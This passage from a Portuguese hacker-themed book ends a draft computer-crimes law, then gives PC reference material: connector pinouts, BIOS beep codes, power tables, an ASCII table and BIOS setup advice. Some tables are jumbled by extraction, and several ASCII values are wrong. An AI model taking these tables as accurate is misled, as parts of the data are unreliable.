V - por motivo fútil;

VI - com o uso indevido de senha ou processo de identificação de terceiro;


ou

VII - com a utilização de qualquer outro meio fraudulento.

Pena: reclusão, de dois a seis anos e multa.

Veiculação de pornografia através de rede de computadores

Art. 14o. Oferecer serviço ou informação de caráter pornográfico, em rede


de computadores, sem exibir, previamente, de forma facilmente visível e
destacada, aviso sobre sua natureza, indicando o seu conteúdo e a
inadequação para criança ou adolescentes.

Pena: detenção, de um a três anos e multa.

22.4 DAS DISPOSIÇÕES FINAIS

Art. 15o. Se qualquer dos crimes previstos nesta lei é práticado no exercício
de atividade profissional ou funcional, a pena é aumentada de um sexto até
a metade.
Terrorismo Tecnológico 411
Aprenda Para Sobreviver

Art. 16o. Nos crimes definidos nesta lei somente se procede mediante
representação do ofendido, salvo se cometidos contra o interesse da União,
Estado, Distrito Federal Município, órgão ou entidade da administração
direta ou indireta, empresa concessionária de serviços públicos, fundações
instituídas ou mantidas pelo poder público, serviços sociais autônomos,
instituições financeiras ou empresas que explorem ramo de atividade
controlada pelo poder público, casos em que a ação é pública
incondicionada.

Art. 17o. Esta lei regula os crimes relativos à informática sem prejuízo das
demais cominações previstas em outros diplomas legais.

Art. 18o. Esta lei entra em vigor 30 (trinta) dias a contar da data de sua
publicação.

Art. 19o. Revogam-se todas as disposições em contrário.


Terrorismo Tecnológico 412
Aprenda Para Sobreviver

Extras Uteis.

Hackers sempre usam os conceitos físicos e lógicos da computação


para conseguir o que querem.
Como pheacker é preciso conhecer a parte de transmissão de
dados, como os conectores e partes ligadas a energia elétrica nos
pc´s. Como hacker é importante saber o que o micro está dizendo
através de sons ou configurações de setup quando são feitos os
vírus, então agora alguns guias muito úteis para vcs ☺
Terrorismo Tecnológico 413
Aprenda Para Sobreviver

CONECTORES

CONECTORES(guia de conectores)
COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 )
CONECTOR DO BARRAMENTO ISA
CONECTOR DO BARRAMENTO PCI
ETHERNET 10/100 BASE-T ( RJ-45 )
FLOPPY DRIVE
FONTE AT
FONTE ATX
GAME CONECTOR
IDE HARD DRIVE
KEYBOARD CONECTOR
KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 )
PORTA PARALELA ( DB-25 )
SCSI
USB
VGA ( DB-15 )

IDE HARD DRIVE CONECTOR

PINO SINAL PINO SINAL IDE MACHO


1 IDE RESET 2 GND
3 DATA 7 4 DATA 8
5 DATA 6 6 DATA 9
7 DATA 5 8 DATA 10
9 DATA 4 10 DATA 11
11 DATA 3 12 DATA 12
13 DATA 2 14 DATA 13
15 DATA 1 16 DATA 14
17 DATA 0 18 DATA 15
19 GND SINAL 20 N/C
21 N/C 22 GND
Terrorismo Tecnológico 414
Aprenda Para Sobreviver

23 I/O WRITE 24 GND


25 I/O READ 26 GND
27 I/O CHANNEL 28 N/C
READY
29 HDACKO 30 GND
31 IRQ 14 32 IOCS16
33 ADDR 1 34 N/C
35 ADDR 0 36 ADDR 2
37 HARD DISK 38 HARD DISK
SELECT 0 SELECT 1
39 IDE ACTIVE 40 GND

FLOPPY DRIVE CONECTOR

PINO SINAL PINO SINAL FDC MACHO


1 GND 2 DENSITY
SELECT
3 GND 4 N/C
5 GND 6 N/C
7 GND 8 INDEX
9 GND 10 MOTOR 0
11 GND 12 DRIVE
SELECT 1
13 GND 14 DRIVE
SELECT 0
15 GND 16 MOTOR 1
17 GND 18 DIRECTION
19 GND 20 STEP
Terrorismo Tecnológico 415
Aprenda Para Sobreviver

21 GND 22 WRITE
DATA
23 GND 24 WRITE
GATE
25 GND 26 TRACK 0
27 GND 28 WRITE
PROTECT
29 GND 30 READ DATA
31 GND 32 HEAD
SELECT
33 GND 34 DISK
CHANGE

FONTE AT

cor pino SINAL


POWER GOOD -
1
5V
2 +5V
3 +12V
4 -12V
5 GND
6 GND

7 GND
8 GND
9 -5V
10 +5V
11 +5V
12 +5V
Terrorismo Tecnológico 416
Aprenda Para Sobreviver

FONTE ATX

+3.3V +3.3V
-12V +3.3V
GND GND
PS/ON +5V
GND GND
GND +5V
GND GND
-5V POWER
OK
+5V 5 VSB
+5V 12V

PORTA PARALELA LPT1, LPT2 ( CONECTOR DB-25 )

PINO SINAL DB25 FÊMEA


1 Estrobe
2 D0 - Bit de dados 0
3 D1 - Bit de dados 1
4 D2 - Bit de dados 2
5 D3 - Bit de dados 3
6 D4 - Bit de dados 4
7 D5 - Bit de dados 5
8 D6 - Bit de dados 6
9 D7 - Bit de dados 7
10 ACK - Confirmação
11 BUSY - Ocupada
12 PE - Fim do papel
13 SLCT - Seleção
Terrorismo Tecnológico 417
Aprenda Para Sobreviver

14 AUTOFDXT - Avanço
automático
15 Erro
16 INIT - Inicialização da
impressora
17 SLCTIN - Seleção de
entrada
18 a 0V -Terra
25

SCSI CONECTOR

PINO FUNCTION PINO FUNCTION SCSI FÊMEA


1 SD+12 35 SD-12
2 SD+13 36 SD-13
3 SD+14 37 SD-14
4 SD+15 38 SD-15
5 SD+1 39 SD-1
6 SD+0 40 SD-0
7 SD+1 41 SD-1
8 SD+2 42 SD-2
9 SD+3 43 SD-3
10 SD+4 44 SD-4
11 SD+5 45 SD-5
Terrorismo Tecnológico 418
Aprenda Para Sobreviver

12 SD+6 46 SD-6
13 SD+7 47 SD-7
14 SDP+0 48 SD-0
15 GND 49 GND
16 DIFS 50 SENIN
17 TPWEX 51 TPWEX
18 TPWEX 52 TPWEX
19 N/C 53 NC
20 GND 54 GND
21 SATN+ 55 SATN-
22 GND 56 GND
23 SBSY+ 57 SBSY-
24 SACK+ 58 SACK-
25 SRST+ 59 SRST-
26 SMSG+ 60 SMSG-
27 SSEL+ 61 SSEL-
28 SCD+ 62 SCD-
29 SREQ+ 63 SREQ-
30 SIO+ 64 SIO-
31 SD+8 65 SD-8
32 SD+9 66 SD-9
33 SD+10 67 SD-10
34 SD+11 68 SD-11
Terrorismo Tecnológico 419
Aprenda Para Sobreviver

USB CONECTOR

PINO SINAL USB USB


1 +5V TIPO A TIPO B
3 UV+(+DATA) FEMÊA MACHO
2 UV- (-
DATA)
4 GND
CHASSI GND

VGA CONECTOR ( HD -15 )

PINO SINAL VGA FÊMEA


1 VERMELHO
2 VERDE
3 AZUL
4 N/C
5 GND
6 GND (Rrtorno
vermelho)
7 GND (Retorno
verde )
8 GND (Retorno azul
)
9 N/C
10 GND
11 N/C
12 SDA
13 SINCRONISMO
HORIZONTAL
14 SINCRONISMO
VERTICAL
15 SCK
Terrorismo Tecnológico 420
Aprenda Para Sobreviver

ETHERNET 10/100 BASE-T ( RJ-45 CONECTOR )

PINO SINAL
1 TRANSMITE
DADOS +
2 TRANSMITE
DADOS -
3 RECEBE
DADOS +
4 N/C
5 N/C
6 RECEBE
DADOS -
7 N/C
8 N/C

COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 )

DB9 MACHO DB SINAL DB DB25 MACHO


9 25
PI PIN
NO O
1 CD - 8
Detecção da
portadora
2 RXD - 3
Recepção
de dados
3 TXD - 2
Transmissã
o de dados
4 DTR - 20
Terminal de
Terrorismo Tecnológico 421
Aprenda Para Sobreviver

dados
pronto
5 GND -Terra 7
do sinal
6 DSR - Data 6
Set pronto
7 RTS - 4
Solicitação
de dados
8 CTS - 5
Pronto para
enviar
9 RI - 22
Indicador de
chamadas

KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 )

PINO SINAL PS2 Fêmea


1 KEYBOARD
DATA
2 MOUSE
DATA
3 GND
4 +5 VCC
5 KEYBOARD
CLOCK
6 MOUSE
CLOCK
Terrorismo Tecnológico 422
Aprenda Para Sobreviver

KEYBOARD CONECTOR

PINO SINAL Keyboard


1 CLK Fêmea
2 DATA
3 RESET
4 GND
5 +5
VCC

GAME CONECTOR

PINO SINAL DB15 FÊMEA


1 + 5 VDC
2 BOTÃO 4
(A_PB1)
3 POSIÇÃO
0 (A_X)
4 GND
5 GND
6 POSIÇÃO
1 (A_Y)
7 BOTÃO 5
(A_PB2)
8 + 5 VDC
9 + 5 VDC
10 BOTÃO 6
(B_PB1)
11 POSIÇÃO
2 (B_X)
12 GND
13 POSIÇÃO
Terrorismo Tecnológico 423
Aprenda Para Sobreviver

3 (B_Y)
14 BOTÃO 7
(B_PB2)
15 +5 VDC

CONECTOR DO BARRAMENTO ISA

sinal pinos sinal


GND B1 A1 IOCHCk
RESET B2 A2 D7
+5v B3 A3 D6
IRQ9 B4 A4 D5
-5v B5 A5 D4
DRQ2 B6 A6 D3
-12v B7 A7 D2
WS B8 A8 D1
+12v B9 A9 D0
GND B10 A10 IOCHRDY
Mem W B11 A11 AEN
Mem R B12 A12 A19
IO W B13 A13 A18
IO R B14 A14 A17
DACK3 B15 A15 A16
DRQ3 B16 A16 A15
DACK1 B17 A17 A14
DRQ1 B18 A18 A13
Ref B19 A19 A12
CLK B20 A20 A11
Terrorismo Tecnológico 424
Aprenda Para Sobreviver

IRQ7 B21 A21 A10


IRQ6 B22 A22 A9
IRQ5 B23 A23 A8
IRQ4 B24 A24 A7
IRQ3 B25 A25 A6
DRQ2 B26 A26 A5
TC B27 A27 A4
ALE B28 A28 A3
+5v B29 A29 A2
OSC B30 A30 A1
GND B31 A31 A0

M16CS D1 C1 SBHE
IO16CS D2 C2 A23
IRQ10 D3 C3 A22
IRQ11 D4 C4 A21
IRQ12 D5 C5 A20
IRQ15 D6 C6 A19
IRQ14 D7 C7 A18
DACK0 D8 C8 A17
DRQ0 D9 C9 MR
DACK5 D10 C10 MW
DRQ5 D11 C11 D8
DACK6 D12 C12 D9
DRQ6 D13 C13 D10
DACK7 D14 C14 D11
Terrorismo Tecnológico 425
Aprenda Para Sobreviver

DRQ7 D15 C15 D12


+5v D16 C16 D13
Master D17 C17 D14
GND D18 C18 D15

CONECTOR DO BARRAMENTO PCI

SINAL PINO SINAL


-12v A1 B1 TRS# Test Reset
TCK Test clok A2 B2 +12 v
GND A3 B3 TMS (Test Mode Select)
TDO Test data A4 B4 TDI (Test Data Imput)
output
+5v A5 B5 +5v
+5v A6 B6 INTA (interrupt A)
INTB (interrupt B) A7 B7 INTC (interrupt C)
INTD (interrupt D) A8 B8 Reserved
PRSNT 1 A9 B9 +5v
Exp.Card Present
1
Reserved A10 B10 Reserved
PRSNT 2 A11 B11 GND
Exp.Card Present
2
GND A12 B12 GND
GND A13 B13 Reserved
Reserved A14 B14 RST (Reset)
GND A15 B15 +5v
Terrorismo Tecnológico 426
Aprenda Para Sobreviver

CLK Clock A16 B16 GNT (Grant (Bus


Memory Only)
GND A17 B17 GND
REQ (Bus Master A18 B18 AD30(Address-Data 30)
Only)
+5v A19 B19 +3.3v
AD31(Address- A20 B20 AD28(Address-Data 28)
Data 31)
AD29(Address- A21 B21 AD26(Address-Data 26)
Data 29)
GND A22 B22 GND
AD27(Address- A23 B23 AD24(Address-Data 24)
Data 27)
AD25(Address- A24 B24 IDSEL
Data 25) Iniciliazation;Device
Select
+3.3v A25 B25 +3.3v
CBE3 Bus A26 B26 AD22(Address-Data 22)
Command Byte
EN 3
AD23(Address- A27 B27 AD20(Address-Data 20)
Data 23)
GND A28 B28 GND
AD21(Address- A29 B29 AD18(Address-Data 18)
Data 21)
AD19(Address- A30 B30 AD16(Address-Data 16)
Data 19)
+3.3v A31 B31 +3.3v
AD17(Address- A32 B32 FRME# Cycle Flame
Data 17)
CBE2 Bus A33 B33 GND
Command Byte
EN 2
GND A34 B34 TRDY (Target Ready)
Terrorismo Tecnológico 427
Aprenda Para Sobreviver

IRDY Initiador A35 B35 GND


Ready
+3.3v A36 B36 Stop
DEVSEL Device A37 B37 +3.3v
Select
GND A38 B38 SDONE Snoop Done
Lock A39 B39 SBO Snoop Backoff
PERR Parity Error A40 B40 GND
+3.3v A41 B41 PAR Parity
SERR System A42 B42 AD15(Address-Data 15)
Error
+3.3v A43 B43 +3.3v
CBE1 Bus A44 B44 AD13(Address-Data 13)
Command Byte
EN 1
AD14(Address- A45 B45 AD11(Address-Data 11)
Data 14)
GND A46 B46 GND
AD12(Address- A47 B47 AD9(Address-Data 9)
Data 12)
AD10(Address- A48 B48 Key
Data 10)
GND A49 B49 Key

Key A52 B52 CBE0# Bus Command


Byte EN 0
Key A53 B53 +3.3v
AD8(Address-Data A54 B54 AD6(Address-Data 6)
8)
AD7(Address-Data A55 B55 AD4(Address-Data 4)
7)
+3.3v A56 B56 GND
Terrorismo Tecnológico 428
Aprenda Para Sobreviver

AD5(Address-Data A57 B57 AD2(Address-Data 2)


5)
AD3(Address-Data A58 B58 AD0(Address-Data 0)
3)
GND A59 B59 +5v
AD1(Address-Data A60 B60 REQ64 Request 64 bit
1) Transfer
+5v A61 B61 +5v
ACK 64 bit A62 B62 +5v
Transfer
Terrorismo Tecnológico 429
Aprenda Para Sobreviver

Beeps
Terrorismo Tecnológico 430
Aprenda Para Sobreviver

CÓDIGOS DE ERRO GERADOS POR BEEPS DE BIOS

BIOS AMI FHOENIX 4.0

1 Refresh dos módulos 1 1 1 3 Processador ou placa


de memória com 1 1 1 4 mãe
defeito ( pode ser
causado pela placa
mãe )
2 Paridade de memória 1 1 2 3 Placa mãe
( sistema que checa 1114
paridade ou pente de
memória com
defeito)
3 Primeiros 64 Kb de 1134 Cachê do
memória com processador
problema
4 Clock com defeito ( 1144 Inicialização da
placa mãe ) controladora IDE
5 Placa mãe ou 1214 Bus Mastering
processador com
defeito ( geralmente o
defeito é na placa
pois o processador
achou o problema )
6 Teclado ou acesso a 1 2 2 1 controladora do
memória alta com 1 3 1 3 teclado com
defeito problema ( pode ser
placa mãe )
1 2 2 3 Bios ou placa mãe
com defeito
7 Novamente placa 1 3 1 1 Memória ou placa
mãe ou processador mãe
com defeito (
geralmente o defeito
é na placa pois o
Terrorismo Tecnológico 431
Aprenda Para Sobreviver

processador achou o
problema )
8 Falha no teste da 1 3 4 1 Memória ou placa
memória de vídeo ( 1 3 4 3 mãe ( verifique a
placa de vídeo ou 1 4 1 1 memória primeiro )
placa mãe )
9 Programa da bios 2132 Alguma placa PCI
com problema ( pode com problema
ser causado também
pela placa mãe )
10 Problema com leitura 2133 Placa de vídeo ( ou
de dados CMOS da placa mãe )
Bios deve-se resetar
a CMOS se persiste
o erro deve-se
substituir a placa
mãe.
11 Memória cachê da 2241 Memória da placa
placa mãe ( se houver mãe ( cachê )
) esta com defeito
1 longo Bios de terceiros (
BIOS AWARD 1 curto placas extras como
controladoras SCSI
por exemplo )
1 longo Um dos Observação: Quando não
primeiros houver som deve-se verificar
módulos de primeiramente os pentes de
memória com memória se estão bem
defeito encaixados, se não resolver
1 longo Controladora reset a CMOS, verifique o
2 curtos de vídeo com encaixe do processador ( se a
defeito ( pode bateria que alimenta a CMOS
ser causado estiver com carga muito baixa
pela placa também pode impedir a
mãe ) inicialização do sistema. Se
os demais Memória RAM após tudo isto continuar sem
Terrorismo Tecnológico 432
Aprenda Para Sobreviver

ou placa mãe sinal, há maior chance de


haver um problema grave com
a placa mãe e em segundo
caso o processador

mais...beeps

AMI BIOS Tone POST Codes -


Fatal Errors
TONE CONDITION
1 short DRAM refresh
2 short Parity circuit
3 short Base 64K RAM
4 short System timer
5 short Processor
6 short Keyboard
controller gate
A20
7 short Virtual mode
exception
8 short Display memory
read/write test
9 short ROM BIOS
checksum
10 short CMOS shutdown
read/write
11 short Cache memory

AMI BIOS Tone POST Codes -


Terrorismo Tecnológico 433
Aprenda Para Sobreviver

Non-Fatal Errors
TONE CONDITION
1 Conventional/extended
long, memory
3
short
1 Display/retrace test
long,
8
short

Phoenix BIOS Tone POST


Codes - Fatal Errors
TONE CONDITION
None CPU register test
None First 64K RAM test
None Interrupt vector
loading proceeding
None CMOS power
failure/checksum
calculation
None Display
configuration
validation
proceeding
None Display running with
video ROM
None Display functional
None Mononchrome
display functional
None CGA display
functional
1-1-3 CMOS write/read
1-1-4 ROM BIOS
checksum
Terrorismo Tecnológico 434
Aprenda Para Sobreviver

1-2-1 Programmable
interval timer
1-2-2 DMA Initialization
1-2-3 DMA page register
write/read
1-3-1 RAM refresh
verification
1-3-3 First 64K RAM chip
or data line
1-3-4 First 64K RAM
odd/even logic
1-4-1 Address line first
64K RAM
1-4-2 Parity failure first
64K RAM
2-1-1 Bit 0, first 64K RAM
2-1-2 Bit 1, first 64K RAM
2-1-3 Bit 2, first 64K RAM
2-1-4 Bit 3, first 64K RAM
2-2-1 Bit 4, first 64K RAM
2-2-2 Bit 5, first 64K RAM
2-2-3 Bit 6, first 64K RAM
2-2-4 Bit 7, first 64K RAM
2-3-1 Bit 8, first 64K RAM
2-3-2 Bit 9, first 64K RAM
2-3-3 Bit 10, first 64K RAM
2-3-4 Bit 11, first 64K RAM
2-4-1 Bit 12, first 64K RAM
2-4-2 Bit 13, first 64K RAM
2-4-3 Bit 14, first 64K RAM
2-4-4 Bit 15, first 64K RAM
3-1-1 Slave DMA register
3-1-2 Master DMA register
3-1-3 Master interrupt
mask register
Terrorismo Tecnológico 435
Aprenda Para Sobreviver

3-1-4 Slave interrupt mask


register
3-2-4 Keyboard controller
3-3-4 Display initialization
3-4-1 Display retrace
3-4-2 Search for video
ROM proceeding

Phoenix BIOS POST Tone


Codes - Non-Fatal Errors
TONE CONDITION
4-2-1 Timer tick
interrupt test
4-2-2 Shutdown test
4-2-3 Gate A20 Failure
4-2-4 Unexpected
interrupt in
protected moe
4-3-1 RAM test (address
failure >FFFFh)
4-3-3 Interval timer
channel 2
4-3-4 Real time clock
4-4-1 Serial Port
4-4-2 Parallel Port
4-4-3 Math Co-
processor test
1-1-2* System board
select
1-1-3* Extender CMOS
RAM

IBM POST Tone Codes


TONE CONDITION
Terrorismo Tecnológico 436
Aprenda Para Sobreviver

NONE System board,


power supply
1 short System passed
all tests
2 short Display error
continuous System board,
power supply
1 System board
long,1short
1 long, 2 Video adapter
short
1 long, 3 EGA
short
3 long 3270 keyboard
card
Terrorismo Tecnológico 437
Aprenda Para Sobreviver

Energia
Terrorismo Tecnológico 438
Aprenda Para Sobreviver

GERENCIAMENTO DE CONSUMO DE ENERGIA NOS PCs

O consumo de energia de um PC depende de vários fatores como


tipo de processador, quantidades de componentes instalados,
monitor, periféricos ...etc..., e depende também do gerenciamento
de energia do sistema. Temos abaixo algumas tabelas que pode
ajudar a configuração do gerenciamento de energia nos PCs.

CONSUMO DE ALGUNS TIPOS DE PCs


Computador ou Potência sem Potência com
monitor (com gerenciamento de gerenciamento de
recursos médios) consumo consumo
386 65 Watts 25 Watts
486 55 Watts 25 Watts
Pentium 45 Watts 15 Watts
Monitor de 14" 45 Watts 5 Watts
Monitor de 15" 70 Watts 5 Watts
Monitor de 20" 120 Watts 5 Watts

CONSUMO DE ALGUNS PERIFÉRICOS E DISPOSITIVOS


Cooler 1,44 Watts
Drive de Disquetes 5 Watts
Drive de CD ou DVD 20 Watts
Gravador de CD 25 Watts
HD 10 Watts
Impressora matricial 30 a 50 Watts
Impressora Jato de Tinta 30 a 50 Watts
Impressora a Laser 500 a 800 Watts
Mouse PS2 0,44 Watts
Mouse serial 0,12 Watts
Scanner de mesa 40 a 50 Watts
Scanner manual 4 a 8 Watts
Som 4 a 5 Watts ( depende da
potência de áudio e volume
Terrorismo Tecnológico 439
Aprenda Para Sobreviver

usado)
Teclado 1,25 Watts
Zip IDE interno Maximo 8,5 Watts

HABILITANDO O GERENCIAMENTO DE CONSUMO

O gerenciamento de consumo está disponível em todos os


computadores e podem ser habilitados, nos mais antigos pode-se
apenas reduzir o consumo do monitor, mas nos mais modernos
pode-se gerenciar o consumo de quase todos os dispositivos.

SISTEMA OPERACIONAL

No sistema operacional Windows pode-se reduzir o consumo


ativando-se o protetor de tela ( screensaver ) do monitor e ajustando
as opções para outros dispositivos ( HD ) através do programa de
Gerenciamento de energia ( Painel de controle ).

BIOS:

Também se pode usar para a finalidade de economia de energia


através das opções Standby ( sleep ), doze e suspend.

Doze - Reduz o consumo durante a inatividade do sistema, com


a redução da velocidade do processador.
Standby - Envia o sinal de Power down para o monitor.
Suspend - Envia um comando para a CPU e para o monitor para
entrar em estado de baixo consumo.

Exemplo de configuração de consumo pela BIOS.


Power management User
Define IRQ1- Keyboard On
PM Control by APM Yes
Terrorismo Tecnológico 440
Aprenda Para Sobreviver

IRQ3-COM2 ( Com PORT ) Off


VGA Adapter Type Green
IRQ4-COM1 ON
Doze Mode 20 Sec
IRQ5-LPT2 Off
Standby Mode 5 Min
IRQ6-FDD Controller On
Suspend Mode 10 Min
IRQ7-LPT1 Off
HDD Power Down 15 Min
IRQ8-RTC Real time Clock Off
Alarm
IRQ3 ( wake up event ) Off
IRQ9-IRQ2 Redir Off
IRQ4 ( wake up event ) On
IRQ10-( Reserved ) Off
IRQ8 ( wake up event ) Off
IRQ11-( Reserved ) On
IRQ12 ( wake up event ) Off
IRQ12-ps 2 Mouse On

POWER DOWN ACTIVITIES


IRQ13-Numeric Data Off
Processor
COM Ports Accessed Off
IRQ14-HDD, IDE / ESDI On
Controller
LPT Ports Accessed Off
IRQ15-Reserved Off
DMA Active ( DMA ) Off
Terrorismo Tecnológico 441
Aprenda Para Sobreviver

Tabela ASCII
Terrorismo Tecnológico 442
Aprenda Para Sobreviver

TABELA ASCII

Tabela ASCII gerada em PC teclado ABNT2

DEC HEX ASC DEC HEX ASC DEC HEX ASC DEC HEX ASC
0 0 NUL 64 40 @ 128 80 Ç 192 C0 +
1 1 SOH 65 41 A 129 81 ü 193 C1 -
2 2 STX 66 42 B 130 82 é 194 C2 -
3 3 ETX 67 43 C 131 83 â 195 C3 +
4 4 EOT 68 44 D 132 84 ä 196 C4 -
5 5 ENQ 69 45 E 133 85 à 197 C5 +
6 6 ACK 70 46 F 134 86 å 198 C6 ã
7 7 BEL 71 47 G 135 87 ç 199 C7 Ã
8 8 BS 72 48 H 136 88 ê 200 C8 +
9 9 HT 73 49 I 137 89 ë 201 C9 +
10 A LF 74 4A J 138 8A è 202 CA -
11 B VT 75 4B K 139 8B ï 203 CB -
12 C FF 76 4C L 140 8C î 204 CC ¦
13 D CR 77 4D M 141 8D ì 205 CD -
14 E SO 78 4E N 142 8E Ä 206 CE +
15 F SI 79 4F O 143 8F Å 207 CF ¤
16 10 DLE 80 50 P 144 90 É 208 D0 ð
17 11 DC1 81 51 Q 145 91 æ 209 D1 Ð
18 12 DC2 82 52 R 146 92 Æ 210 D2 Ê
19 13 DC3 83 53 S 147 93 ô 211 D3 Ë
20 14 DC4 84 54 T 148 94 ö 212 D4 È
21 15 NAK 85 65 U 149 95 ò 213 D5 i
22 16 SYN 86 56 V 150 96 û 214 D6 Í
23 17 ETB 87 57 W 151 97 ù 215 D7 Î
Terrorismo Tecnológico 443
Aprenda Para Sobreviver

24 18 CAN 88 58 X 152 98 ÿ 216 D8 Ï


25 19 EM 89 59 Y 153 99 Ö 217 D9 +
26 1A SUB 90 5A Z 154 9A Ü 218 DA +
27 1B ESC 91 5B [ 155 9B ø 219 DB _
28 1C FS 92 5C \ 156 9C £ 220 DC _
29 1D GS 93 5D ] 157 9D Ø 221 DD ¦
30 1E RS 94 5E ^ 158 9E × 222 DE Ì
31 1F US 95 5F _ 159 9F ƒ 223 DF _
32 20 SP 96 60 ` 160 A0 á 224 E0 Ó
33 21 ! 97 61 a 161 A1 í 225 E1 ß
34 22 " 98 62 b 162 A2 ó 226 E2 Ô
35 23 # 99 63 c 163 A3 ú 227 E3 Ò
36 24 $ 100 64 d 164 A4 ñ 228 E4 õ
37 25 % 101 65 e 165 A5 Ñ 229 E5 Õ
38 26 & 102 66 f 166 A6 ª 230 E6 µ
39 27 ' 103 67 g 167 A7 º 231 E7 þ
40 28 ( 104 68 h 168 A8 ¿ 232 E8 Þ
41 28 ) 105 69 i 169 A9 ® 233 E9 Ú
42 2A * 106 6A j 170 AA ¬ 234 EA Û
43 2B + 107 6B k 171 AB ½ 235 EB Ù
44 2C , 108 6C l 172 AC ¼ 236 EC ý
45 2D - 109 6D m 173 AD ¡ 237 ED Ý
46 2E . 110 6E n 174 AE « 238 EE ¯
47 2F / 111 6F o 175 AF » 239 EF ´
48 30 0 112 70 p 176 B0 _ 240 F0
48 31 1 113 71 q 177 B1 _ 241 F1 ±
50 32 2 114 72 r 178 B2 _ 242 F2 _
51 33 3 115 73 s 179 B3 ¦ 243 F3 ¾
Terrorismo Tecnológico 444
Aprenda Para Sobreviver

52 34 4 116 74 t 180 B4 ¦ 244 F4 ¶


53 35 5 117 75 u 181 B5 Á 245 F5 §
54 36 6 118 76 v 182 B6 Â 246 F6 ÷
55 37 7 119 77 w 183 B7 À 247 F7 ¸
56 38 8 120 78 x 184 B8 © 248 F8 °
57 39 9 121 79 y 185 B9 ¦ 249 F9 ¨
58 3A : 122 7A z 186 BA ¦ 250 FA ·
59 3B ; 123 7B { 187 BB + 251 FB ¹
60 3C < 124 7C | 188 BC + 252 FC ³
61 3D = 125 7D } 189 BD ¢ 253 FD ²
62 3E > 126 7E ~ 190 BE ¥ 254 FE _
63 3F ? 127 7F DEL 191 BF + 255 FF DEL
Terrorismo Tecnológico 445
Aprenda Para Sobreviver

Setup
Terrorismo Tecnológico 446
Aprenda Para Sobreviver

Setup
Para entrar no setup você deve pressionar a tecla Del durante
a contagem de memória. Em alguns micros "de marca" (como os da
IBM), a tecla é outra e você deve prestar atenção às instruções que
aparecem na tela do micro durante a contagem de memória para
poder ter acesso ao setup.

Dentro do setup, a navegação é normalmente feita utilizando-se as


setas de movimentação do teclado, a tecla Enter para selecionar um
menu, Esc para retornar ao menu anterior e as teclas Page Up e
Page Down para modificar uma opção existente.

É muito importante notar que as alterações feitas enquanto você


está dentro do setup não são gravadas automaticamente dentro da
memória de configuração (CMOS). Por isso há a necessidade de se
gravar as alterações antes de sair do setup, através da opção Save
and Exit.

Ao entrar no setup você verá um menu principal com opções para a


entrada em outros menus de configuração. Essas opções são
basicamente as seguintes:

• CPU Setup: Em micros onde a placa-mãe não tem jumpers


de configuração você encontrará esse menu, que serve para
você configurar o processador: multiplicação de clock, clock
externo, etc

• Standard CMOS Setup: Setup básico. Nesse menu


configuramos opções básicas do micro, como o tipo de
unidade de disquete, a data e hora e os parâmetros do disco
rígido (os parâmetros do disco rígido podem ser configurados
automaticamente através de uma opção chamada Hdd Auto
Detection).
Terrorismo Tecnológico 447
Aprenda Para Sobreviver

• Advanced CMOS Setup (ou BIOS Features Setup): Setup


avançado. Aqui você encontrará algumas opções de
configuração avançada, que em sua maioria inclui opções de
customização do seu micro e que podem ser alteradas de
acordo com o seu gosto pessoal. Também há aqui algumas
opções que podem aumentar o desempenho do micro.

• Advanced Chipset Setup: Setup avançado do chipset. São


opções para a configuração do chipset da placa-mãe. Essas
opções incluem configurações que normalmente envolvem o
acesso à memória RAM do micro, como wait states. Se você
fizer alguma configuração errada nesse menu o micro pode
travar. Por isso, não mexa nas opções desse menu a não ser
que você tenha certeza do que está fazendo.

• PCI/Plug and Play Setup: Configura os recursos alocados por


dispositivos instalados no micro, tais como placas de som e
fax/modems.

• Power Management Setup: Neste menu você faz toda a


configuração do gerenciamento de consumo elétrico, a fim de
que o micro economize energia.

• Peripheral Setup (ou Integrated Peripherals): Configura os


dispositivos integrados à placa-mãe (on-board).

• Auto Configuration With BIOS Defaults: Coloca os valores de


fábrica em todas as opções do setup.
Terrorismo Tecnológico 448
Aprenda Para Sobreviver

• Auto Configuration With Power-on Defaults: Coloca os valores


contidos na memória CMOS nas opções do setup. Em outras
palavras, configura o setup da mesma maneira que estava
antes de você entrar nele.

• Change Password: Configura uma senha que será pedida


quando você ligar o micro (ou tentar entrar no setup,
dependendo da configuração efetuada no setup avançado).

• Auto Detect Hard Disk (ou HDD Auto Detect ou IDE Setup):
Lê os parâmetros dos discos rígidos IDE do micro e configura
automaticamente o setup avançado com os valores lidos.

• Hard Disk Utility (ou HDD Low Level Format): Formata o disco
rígido em baixo nível (formatação física). Essa opção não
deve nunca ser usada, sob a pena de você danificar
permanentemente o seu disco rígido.

• Write to CMOS and Exit: Salva as alterações efetuadas na


memória de configuração (CMOS) e sai do setup.

• Do Not Write to CMOS and Exit: Sai do setup sem gravar as


alterações.
Terrorismo Tecnológico 449
Aprenda Para Sobreviver

O setup básico não apresenta dificuldades em sua configuração.


Nele você deve configurar:

Data e hora do sistema, através das opções date e time,


respectivamente.

Tipos de unidades de disquete instaladas no micro. Você deve


configurar que tipo (2.88 MB, 1.44 MB, 1.2 MB, 720 KB ou 360 KB)
são as unidades de disquete A e B de seu micro. Um erro muito
comum cometido por iniciantes é achar que para trocar a unidade A
com a B (isto é, a atual unidade A passar a se chamar B e vice-
versa) basta mudar aqui a configuração. Isso não é verdade. Para
trocar a unidade A com a B é necessário abrir o micro e trocar a
posição das unidades no flat-cable que liga as unidades à
controladora (normalmente na placa-mãe). A unidade instalada na
ponta do cabo sempre será a A e a unidade instalada no meio,
sempre será a unidade B. Como atualmente a maioria dos micros só
tem uma unidade (A, de 1.44 MB), na maioria das vezes você deve
configurar a unidade A como sendo de 1.44 MB e a unidade B como
"não instalada" (Not Installed).

Geometria do disco rígido. Essa é a configuração mais difícil do


setup básico mas, para a nossa sorte, há uma opção no menu
principal do setup – chamada Hdd Auto Detection, IDE Setup ou
similar, como vimos na semana passada – que lê os dados do disco
rígido e configura automaticamente a geometria do disco rígido.
Portanto, não há com o que se preocupar.

Tipo de placa de vídeo. Configure como EGA/VGA. Algumas


pessoas se confundem aqui. Essa opção configura o tipo de placa
de vídeo instalada dentro do micro e não o tipo de monitor de vídeo.
Existe uma opção chamada "Monochrome", que é para micros que
tenham uma placa de vídeo MDA instalada. Se você tem um micro
com placa de vídeo VGA ou Super VGA com um monitor
monocromático instalado, a opção correta é EGA/VGA (que
configura a placa de vídeo que está instalada no micro) e não
Monochrome (já que a sua placa de vídeo não é MDA).
